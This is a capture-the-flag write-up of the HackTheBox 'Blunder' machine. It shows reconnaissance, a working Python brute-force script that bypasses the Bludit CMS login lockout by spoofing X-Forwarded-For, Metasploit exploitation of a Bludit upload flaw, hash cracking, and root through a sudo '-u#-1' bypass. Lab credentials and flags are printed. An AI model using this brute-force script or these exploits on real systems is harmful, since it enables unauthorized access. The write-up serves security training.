Categories
HackTheBox Writeups

[HTB] – Blunder

Blunder

Hi again ! This my write-up of Blunder, an easy Linux box released on May 30th 2020 on HackTheBox.

Recon

For a starter, let's use Nmap to scan the target.

$ nmap -A -p- -T4 10.10.10.191

Here is the output of the previous command :

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-31 14:12 CEST
Nmap scan report for 10.10.10.191
Host is up (0.024s latency).
Not shown: 65533 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Ubiquiti AirOS 5.5.9 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.3 (89%), Linux 2.6.32 - 3.1 (89%), Linux 3.7 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 21/tcp)
HOP RTT      ADDRESS
1   26.50 ms 10.10.14.1
2   26.96 ms 10.10.10.191

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.29 seconds

After taking a look a the website, there wasn't much to discover either. I tried to look for hidden files and directories. This is where it gets interesting. I'm used to using dirbuster for that task, but I had some trouble with screen resolution in VMs lately, so the nice graphical interface isn't showing up nicely, so I decided to install gobuster, and command-line alternative. And because it's command-line based, it's faster and more practical (and any good hacker should use commands right ? 🙂 ).

gobuster -w /usr/share/wordlists/directory-list-2.3-medium.txt dir -u http://10.10.10.191:80/

That uncovers a few folders and files, but one in particular /admin. When navigating to 10.10.10.191/admin, you'll get a Blundit connection form, Bludit being a CMS, with a few vulnerabilities (brute-forcing passwords for example). One thing we could still use is a username.

After some (long) time, I used gobuster again, looking for .txt files this time. Indeed, there are sometimes very useful files like credentials.txt, robot.txt, todo.txt, users.txt, config.txt, etc...

gobuster -w /usr/share/wordlists/directory-list-2.3-medium.txt dir -u http://10.10.10.191:80/ -x txt

Speaking of the devil :

todo.txt contains some interesting information :

Fergus seems like a username.

Here is the script I found (and modified, so here is the original link). Let's try it out.

#!/usr/bin/env python3
import re
import requests
import sys

host = 'http://10.10.10.191'
login_url = host + '/admin'
username = 'fergus'
print("[*] Reading wordlist...")
with open(sys.argv[1],"r") as f:
    wordlist = [p.replace("\n", "") for p in f.readlines()]

print("====================== CONFIG ======================")
print("== login url : {}".format(login_url))
print("== username : {}".format(username))
print("== wordlist : {} ({} passwords)".format(sys.argv[1], len(wordlist)))
print("====================================================")
print("\n[*] Starting")

counter = 0
for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    if counter%100 == 0 and counter != 0:
        print('[*] {} tries...'.format(counter))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

    counter += 1

With rockyou I gave up after a few hours, it's just taking to long... So after trying a few other wordlists, I created my own.

cewl --depth 5 --min_word_length 5 http://10.10.10.191 > wordlist.txt

Here we go, we got some credentials !

fergus:RolandDeschain

Own user

Now let's use another bludit vulnerability : Directory Traversal Image File Upload CVE-2019-16113

Fireup Metasploit, and let it handle the rest :

Just remember to replace LHOST with your IP address corresponding to your tun0 interface.

To get a shell just type in shell in the meterpreter command prompt, and then python -c 'import pty; pty.spawn("/bin/bash")'

After some enumeration, I found an interesting file with user credentials, that we only need to crack, at /var/www/bludit-3.10.0a/bl-content/databases

-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
cat users.php

{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}

Remember, the most powerful tool to crack hashes is .... Google. No just kidding, but googling a simple hash often leads to knowing what kind of algorithm created it, and in some cases like right here, what the password is.

So now we got the following credentials :

huge:Password120

Let's get the user flag and get right to the root privilege escalation that is fairly simple on this box.

www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ su hugo
su hugo
Password: Password120

hugo@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ id
id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
hugo@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ cat /home/hugo/user.txt
cat /home/hugo/user.txt
eef5cf18500c8b9f749c16e82a05890e

Own root

The first thing to always do when getting new privileges is to check what your allowed to do : sudo -l

f5cf18500c8b9f749c16e82a05890e
hugo@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

(ALL, !root) /bin/bash, never seen this one, let's google it. Turns out it's super easy to get a root shell here. Just type in : sudo -u#-1 /bin/bash

hugo@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/var/www/bludit-3.9.2/bl-content/tmp# cat /root/root.txt
cat /root/root.txt
07fa8ead67b17057681397f0a9e9a5f7

And here we go, that's all for this write-up, I hope you enjoyed 😉

Leave a Reply

Your email address will not be published.